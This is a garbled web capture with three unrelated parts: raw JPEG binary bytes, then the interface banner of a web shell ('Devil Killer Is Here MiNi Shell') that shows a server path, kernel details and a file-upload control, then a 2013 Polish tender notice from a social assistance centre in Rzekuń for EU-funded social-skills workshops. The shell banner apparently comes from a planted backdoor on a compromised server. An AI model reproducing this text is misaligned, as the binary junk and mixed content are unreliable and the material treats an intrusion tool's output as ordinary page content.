JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130619/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130619/117847-N-2013.html

<p class="kh_header"><b>Rzekuń: Zorganizowanie i przeprowadzenie konsultacji, warsztatów, treningów oraz szkoleń w zakresie umiejętności społecznych dla Uczestników projektu pn.: Aktywizacja społeczno-zawodowa osób pozostających bez pracy -Zacznijmy od nowa, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 117847 - 2013; data zamieszczenia: 19.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Kolonia 1B, 07-411 Rzekuń, woj. mazowieckie, tel. 29 7617395, faks 29 6432422.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rzekun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie konsultacji, warsztatów, treningów oraz szkoleń w zakresie umiejętności społecznych dla Uczestników projektu pn.: Aktywizacja społeczno-zawodowa osób pozostających bez pracy -Zacznijmy od nowa, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie konsultacji, warsztatów, treningów oraz szkoleń w zakresie umiejętności społecznych dla Uczestników projektu pn.: Aktywizacja społeczno-zawodowa osób pozostających bez pracy -Zacznijmy od nowa, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6, 85.31.23.20-8, 80.56.20.00-1, 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. posiadania wiedzy i doświadczenia - warunek zostanie spełniony, jeżeli Wykonawca wykaże w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: 
Część I:
osobiste przeprowadzenie minimum 3 warsztatów/szkoleń w grupie nie mniejszej niż 10 osób, których zakres tematyczny zawierał co najmniej 70 godzin zajęć z zagadnień ściśle związanych z zakresem merytorycznym warsztatów stanowiących przedmiot zamówienia
Część II
osobiste przeprowadzenie minimum 3 warsztatów/szkoleń w grupie nie mniejszej niż 10 osób, których zakres tematyczny zawierał co najmniej 70 godzin zajęć z zagadnień ściśle związanych z zakresem merytorycznym warsztatów stanowiących przedmiot zamówienia
Część III
osobiste przeprowadzenie minimum 3 warsztatów/szkoleń w grupie nie mniejszej niż 10 osób, których zakres tematyczny zawierał co najmniej 70 godzin zajęć z zagadnień ściśle związanych z zakresem merytorycznym warsztatów stanowiących przedmiot zamówienia
Część IV
osobiste przeprowadzenie minimum 3 warsztatów/szkoleń w grupie nie mniejszej niż 10 osób, których zakres tematyczny zawierał co najmniej 70 godzin zajęć z zagadnień ściśle związanych z zakresem merytorycznym warsztatów stanowiących przedmiot zamówienia
Część V
osobiste przeprowadzenie minimum 4 warsztatów/szkoleń w grupie nie mniejszej niż 5 osób, których zakres tematyczny zawierał co najmniej 50 godzin zajęć z zagadnień ściśle związanych z zakresem merytorycznym szkolenia stanowiącego przedmiot części zamówienia
Część VI
osobiste przeprowadzenie minimum 3 warsztatów/szkoleń w grupie nie mniejszej niż 10 osób, których zakres tematyczny zawierał co najmniej 70 godzin zajęć z zagadnień ściśle związanych z zakresem merytorycznym warsztatów stanowiących przedmiot części zamówienia minimum 
Część VII
osobiste przeprowadzenie minimum 3 warsztatów/szkoleń w grupie nie mniejszej niż 10 osób, których zakres tematyczny zawierał co najmniej 70 godzin zajęć z zagadnień ściśle związanych z zakresem merytorycznym warsztatów stanowiących przedmiot zamówienia;
Część VIII
osobiste przeprowadzenie minimum 3 warsztatów/szkoleń w grupie nie mniejszej niż 10 osób, których zakres tematyczny zawierał co najmniej 60 godzin zajęć z zagadnień ściśle związanych z zakresem merytorycznym warsztatów stanowiących przedmiot zamówienia (w przypadku prowadzenia zajęć z zakresu savoir-vivre w ramach innego kursu, należy wykazać tylko godziny tego bloku tematycznego);

2. dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia- wymagane jest wykazanie przez Wykonawcę, że dysponuje co najmniej jedną osobą posiadającą:
Część I: 
wykształcenie wyższe magisterskie o kierunku psychologia i posiadającą minimum dwuletnie doświadczenie zawodowe w prowadzeniu poradnictwa psychologicznego, indywidualnego i zajęć grupowych tj. osobiste przeprowadzenie minimum 3 warsztatów/szkoleń w grupie nie mniejszej niż 10 osób, których zakres tematyczny zawierał co najmniej 8 godzin zajęć z zagadnień ściśle związanych z zakresem merytorycznym warsztatów stanowiących przedmiot zamówienia.
Część II
wykształcenie wyższe magisterskie o kierunku lub specjalności doradztwo zawodowe, posiadającą minimum dwuletnie doświadczenie w pracy w poradnictwie zawodowym - indywidualne konsultacje, grupowe warsztaty aktywnego poszukiwania pracy tj. osobiste przeprowadzenie minimum 3 warsztatów/szkoleń w grupie nie mniejszej niż 10 osób, których zakres tematyczny zawierał co najmniej 8 godzin zajęć z zagadnień ściśle związanych z zakresem merytorycznym warsztatów stanowiących przedmiot zamówienia.
Część III
wykształcenie wyższe magisterskie o kierunku psychologia i doświadczenie w prowadzeniu warsztatów umiejętności psychospołecznych, tj. osobiste przeprowadzenie minimum 3 warsztatów/szkoleń w grupie nie mniejszej niż 10 osób, których zakres tematyczny zawierał co najmniej 8 godzin zajęć z zagadnień ściśle związanych z zakresem merytorycznym warsztatów stanowiących przedmiot zamówienia.
Część IV
wykształcenie wyższe magisterskie o kierunku lub specjalności doradztwo zawodowe i doświadczenie w prowadzeniu warsztatów umiejętności społeczno-zawodowych, tj. osobiste przeprowadzenie minimum 3 warsztatów/szkoleń w grupie nie mniejszej niż 10 osób, których zakres tematyczny zawierał co najmniej 8 godzin zajęć z zagadnień ściśle związanych z zakresem merytorycznym warsztatów stanowiących przedmiot zamówienia.
Część V
wykształcenie wyższe magisterskie i doświadczenie w prowadzeniu szkolenia z zakresu pierwszej pomocy przedmedycznej, tj. osobiste przeprowadzenie minimum 4 warsztatów/szkoleń w grupie nie mniejszej niż 5 osób, których zakres tematyczny zawierał co najmniej 15 godzin zajęć z zagadnień ściśle związanych z zakresem merytorycznym szkolenia stanowiącego przedmiot części zamówienia.
Część VI
wykształcenie wyższe magisterskie na jednym z kierunków studiów: psychologia, pedagogika, praca socjalna, nauki o rodzinie (lub uzyskane za granicą wykształcenie uznane w Rzeczypospolitej Polskiej za równorzędne z ww.) i doświadczenie w prowadzeniu warsztatów umiejętności wychowawczych, tj. osobiste przeprowadzenie minimum 3 warsztatów/szkoleń w grupie nie mniejszej niż 10 osób, których zakres tematyczny zawierał co najmniej 15 godzin zajęć z zagadnień ściśle związanych z zakresem merytorycznym warsztatów stanowiących przedmiot części VI i/lub VII  zamówienia.
Część VII
wykształcenie wyższe magisterskie na jednym z kierunków studiów: psychologia, pedagogika, praca socjalna, nauki o rodzinie (lub uzyskane za granicą wykształcenie uznane w Rzeczypospolitej Polskiej za równorzędne z ww.) i doświadczenie w prowadzeniu warsztatów rodzinnych, tj. osobiste przeprowadzenie minimum 3 warsztatów/szkoleń w grupie nie mniejszej niż 10 osób, których zakres tematyczny zawierał co najmniej 15 godzin zajęć z zagadnień ściśle związanych z zakresem merytorycznym warsztatów stanowiących przedmiot zamówienia
Część VIII
wykształcenie wyższe magisterskie i doświadczenie w prowadzeniu warsztatów w zakresie savoir-vivre, tj. osobiste przeprowadzenie minimum 3 warsztatów/szkoleń w grupie nie mniejszej niż 10 osób, których zakres tematyczny zawierał co najmniej 15 godzin zajęć z zagadnień ściśle związanych z zakresem merytorycznym warsztatów stanowiących przedmiot zamówienia.

Przez zajęcia o zbliżonej tematyce należy rozumieć szkolenia obejmujące m.in. konsultacje, warsztaty, treningi, szkolenia, o których mowa w SIWZ. Spełnienie warunku należy potwierdzić poprzez złożenie stosownego oświadczenia wg załącznika nr 2 do SIWZ oraz przedłożenie dokumentów, o których mowa w pkt. 9 SIWZ. Ocena spełniania warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I: Wymagane jest wykazanie przez Wykonawcę, że dysponuje co najmniej jedną osobą posiadającą wykształcenie wyższe magisterskie o kierunku psychologia i posiadającą minimum dwuletnie doświadczenie zawodowe w prowadzeniu poradnictwa psychologicznego, indywidualnego i zajęć grupowych tj. osobiste przeprowadzenie minimum 3 warsztatów/szkoleń w grupie nie mniejszej niż 10 osób, których zakres tematyczny zawierał co najmniej 70 godzin zajęć z zagadnień ściśle związanych                         z zakresem merytorycznym warsztatów stanowiących przedmiot zamówienia; Część II: wymagane jest wykazanie przez Wykonawcę, że dysponuje co najmniej jedną osobą posiadającą wykształcenie wyższe magisterskie o kierunku lub specjalności doradztwo zawodowe, posiadającą minimum dwuletnie doświadczenie w pracy w poradnictwie zawodowym - indywidualna konsultacja, grupowe warsztaty aktywnego poszukiwania pracy tj. osobiste przeprowadzenie minimum 3 warsztatów/szkoleń w grupie nie mniejszej niż 10 osób, których zakres tematyczny zawierał co najmniej 70 godzin zajęć z zagadnień ściśle związanych z zakresem merytorycznym warsztatów stanowiących przedmiot zamówienia;                Część III: wymagane jest wykazanie przez Wykonawcę, że dysponuje co najmniej jedną osobą posiadającą wykształcenie wyższe magisterskie o kierunku psychologia i doświadczenie w prowadzeniu warsztatów umiejętności społeczno-zawodowych, tj. osobiste przeprowadzenie minimum                               3 warsztatów/szkoleń w grupie nie mniejszej niż 10 osób, których zakres tematyczny zawierał co najmniej 70 godzin zajęć z zagadnień ściśle związanych z zakresem merytorycznym warsztatów stanowiących przedmiot zamówienia; Część IV: wymagane jest wykazanie przez Wykonawcę, że dysponuje                         co najmniej jedną osobą posiadającą wykształcenie wyższe magisterskie o kierunku lub specjalności doradztwo zawodowe, posiadającą minimum dwuletnie doświadczenie w pracy w poradnictwie zawodowym - indywidualna konsultacja, grupowe warsztaty aktywnego poszukiwania pracy tj. osobiste przeprowadzenie minimum 3 warsztatów/szkoleń w grupie nie mniejszej niż 10 osób, których zakres tematyczny zawierał co najmniej 70 godzin zajęć z zagadnień ściśle związanych z zakresem merytorycznym warsztatów stanowiących przedmiot zamówienia; Część V: wymagane jest wykazanie przez Wykonawcę, że dysponuje co najmniej jedną osobą posiadającą wykształcenie wyższe magisterskie i doświadczenie w prowadzeniu szkolenia z zakresu pierwszej pomocy przedmedycznej,              tj. osobiste przeprowadzenie minimum 4 warsztatów/szkoleń w grupie nie mniejszej niż 5 osób, których zakres tematyczny zawierał co najmniej 50 godziny zajęć z zagadnień ściśle związanych z zakresem merytorycznym szkolenia stanowiącego przedmiot części zamówienia; Część VI: wymagane jest wykazanie przez Wykonawcę, że dysponuje co najmniej jedną osobą posiadającą wykształcenie wyższe magisterskie na jednym z kierunków studiów: psychologia, pedagogika, praca socjalna, nauki o rodzinie (lub uzyskane za granicą wykształcenie uznane w Rzeczypospolitej Polskiej za równorzędne z ww.)                 i doświadczenie w prowadzeniu warsztatów umiejętności wychowawczych, tj. osobiste przeprowadzenie minimum 3 warsztatów/szkoleń w grupie nie mniejszej niż 10 osób, których zakres tematyczny zawierał co najmniej 70 godzin zajęć z zagadnień ściśle związanych z zakresem merytorycznym warsztatów stanowiących przedmiot części zamówienia; Część VII: wymagane jest wykazanie przez Wykonawcę,               że dysponuje co najmniej jedną osobą posiadającą wykształcenie wyższe magisterskie na jednym                  z kierunków studiów: psychologia, pedagogika, praca socjalna, nauki o rodzinie (lub uzyskane za granicą wykształcenie uznane w Rzeczypospolitej Polskiej za równorzędne z ww.) i doświadczenie                           w prowadzeniu warsztatów rodzinnych, tj. osobiste przeprowadzenie minimum 3 warsztatów/szkoleń                w grupie nie mniejszej niż 10 osób, których zakres tematyczny zawierał co najmniej 70 godzin zajęć                 z zagadnień ściśle związanych z zakresem merytorycznym warsztatów stanowiących przedmiot zamówienia; Część VIII: wykazanie przez Wykonawcę, że dysponuje co najmniej jedną osobą posiadającą wykształcenie wyższe magisterskie i doświadczenie w prowadzeniu warsztatów w zakresie savoir-vivre, tj. osobiste przeprowadzenie minimum 3 warsztatów/szkoleń w grupie nie mniejszej                   niż 10 osób, których zakres tematyczny zawierał co najmniej 60 godzin zajęć z zagadnień ściśle związanych z zakresem merytorycznym warsztatów stanowiących przedmiot zamówienia;    
Ocena spełnienia warunku dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu dokumenty oraz oświadczenia, według kryterium spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dowody potwierdzające, że usługi zostały wykonane lub są wykonywane należycie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza możliwość dokonania zmiany warunków zawartej umowy dla każdej części zamówienia w stosunku do treści oferty, na podstawie której wybrano Wykonawcę w zakresie: 1) danych teleadresowych dotyczących Stron umowy, w przypadku dokonania zmian w tym zakresie ze strony Zamawiającego i/lub Wykonawcy w czasie obowiązywania umowy; 2) harmonogramu świadczenia usługi, wynikającej z konieczności zsynchronizowania czasowego warsztatów/szkolenia z innymi działaniami ukierunkowanymi na Uczestników projektu pn.: Aktywizacja społeczno-zawodowa osób pozostających bez pracy -Zacznijmy od nowa- lub też spowodowanej czynnikami obiektywnymi, uniemożliwiającymi realizację zamówienia zgodnie z pierwotną wersją harmonogramu, pod warunkiem, że końcowy termin realizacji zamówienia nie ulegnie przesunięciu w częściach I-VIII poza I połowę grudnia 2013 r.,  z zastrzeżeniem ppkt. 6 niniejszego punktu oraz pod warunkiem zaakceptowania zmiany harmonogramu zarówno przez Zamawiającego, jak i Wykonawcę; 3) liczby spotkań i czasu trwania poszczególnych zajęć warsztatowych, pod warunkiem, że maksymalna liczba godzin warsztatów w ciągu dnia dla jednej grupy w częściach I-VIII nie przekroczy sześciu godzin.
2. Dopuszcza się dokonywanie zmian treści umowy w podanym zakresie zmiany składu kadry szkoleniowej, przy czym zmiany te nie mogą powodować pogorszenia poziomu kwalifikacji zmienionej kadry w stosunku do tej zaoferowanej w ofercie przetargowej. Dokonane w/w zmiany wymagają sporządzania aneksu. Wykonawca zobowiązany jest do wcześniejszego poinformowania Zamawiającego w formie pisemnej o zaistniałych okolicznościach, które spowodowały zmiany osób prowadzących. Zamawiający zastrzega sobie, nie wyrażenie zgody na prowadzenie zajęć przez wskazaną osobę w przypadku, gdy kwalifikacje takiej osoby będą niższe od proponowanych w ofercie.
3. Dopuszcza się dokonywanie zmian terminu zakończenia realizacji umowy, w przypadku wcześniejszego zakończenia realizacji projektu pn.: Aktywizacja społeczno-zawodowa osób pozostających bez pracy -Zacznijmy od nowa-lub konieczności zsynchronizowania terminu warsztatów/szkolenia z innymi działaniami realizowanymi w projekcie albo spowodowanej czynnikami obiektywnymi uniemożliwiającymi realizację zamówienia w pierwotnie ustalonym terminie, pod warunkiem, że termin zakończenia warsztatów/szkolenia zostanie wyznaczony najpóźniej na dzień 10 grudnia 2013 roku; 
